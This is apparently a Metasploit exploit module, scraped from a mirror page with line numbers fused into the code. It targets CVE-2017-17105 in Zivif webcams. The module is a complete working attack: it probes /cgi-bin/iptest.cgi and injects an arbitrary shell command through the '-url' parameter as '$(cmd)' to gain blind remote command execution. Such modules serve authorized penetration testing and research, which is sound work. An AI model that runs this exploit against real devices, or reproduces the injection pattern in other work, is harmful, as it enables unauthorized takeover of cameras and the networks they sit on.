CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/http/zivif_ipcheck_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Zivif Camera iptest.cgi Blind Remote Command Execution',15'Description' => %q{16This module exploits a remote command execution vulnerability in Zivif17webcams. This is known to impact versions prior to and including v2.3.4.2103.18Exploit was reported in CVE-2017-17105.19},20'License' => MSF_LICENSE,21'Author' => [ 'Silas Cutler (p1nk)' ],22'References' => [23[ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],24[ 'CVE', '2017-17105' ]25],26'Platform' => 'unix',27'Targets' => [28[ 'Automatic Target', {}]29],30'Payload' => {31'Space' => 1024,32'BadChars' => "\x00\x27",33'DisableNops' => true,34'Compat' =>35{36'PayloadType' => 'cmd',37'RequiredCmd' => 'generic'38}39},40'DefaultOptions' => {41'PAYLOAD' => 'cmd/unix/generic'42},43'Privileged' => false,44'DisclosureDate' => '2017-09-01',45'DefaultTarget' => 0,46'Notes' => {47'Stability' => [ CRASH_SAFE ],48'SideEffects' => [ IOC_IN_LOGS ],49'Reliability' => [ REPEATABLE_SESSION ]50}51)52)53end5455def check56res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))57unless res58vprint_error('Connection failed')59return Exploit::CheckCode::Unknown60end61unless res.code && res.code == 20062return CheckCode::Safe63end6465CheckCode::Detected66end6768def exploit69print_status('Sending request')70cmd = datastore['CMD']7172res = send_request_cgi(73'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),74'method' => 'GET',75'vars_get' => {76'cmd' => 'iptest.cgi',77'-time' => Time.now.to_i,78'-url' => "$(#{cmd})"79}80)8182unless res83fail_with(Failure::Unreachable, 'Connection failed')84end8586if res.code && res.code == 20087print_good('Command sent successfully')88else89fail_with(Failure::UnexpectedReply, 'Unable to send command to target')90end91end9293end949596